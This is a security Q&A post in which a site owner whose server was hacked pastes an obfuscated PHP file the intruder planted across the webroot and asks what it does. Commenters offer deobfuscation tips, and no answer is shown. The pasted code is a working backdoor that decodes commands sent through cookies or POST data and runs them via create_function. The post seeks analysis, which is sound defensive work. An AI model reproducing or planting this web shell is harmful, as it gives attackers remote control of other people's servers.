What does this potentially malicious php code do?

Question

Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and - even though I managed to beautify it - I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here's the code and I'd appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj[10]($vcekj[1], $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj[4]($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj[0];
            $juptpoi = $zznqw("", $axsex[1]($axsex[2]));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}

Unfortunately, we are not a code analysis site or a deobfuscation service. — schroeder, Sep 08 '21 at 10:32
It is pretty trivial to decode the massive array at the start. Use a sandbox to break it all up: http://sandbox.onlinephpfunctions.com/code/70ef936f4881289cf4783006fb924f5e57469425 — schroeder, Sep 08 '21 at 10:38
@schroeder thank you for taking the time to point me to the right direction, despite my question being off-topic — JohnTheWalker, Sep 08 '21 at 10:56
For this approach to obfuscation, once you decode the array, everything else is easy to sort out. You just need to "think like a compiler" and not get hung up on random strings. If it helps, replace the random strings with animal names to give your brain something to work with. — schroeder, Sep 08 '21 at 11:00
@Anders ah! In my memory, we didn't have one for PHP, but my memory failed me. Thanks! — schroeder, Sep 09 '21 at 08:29

What does this potentially malicious php code do?

0 Answers0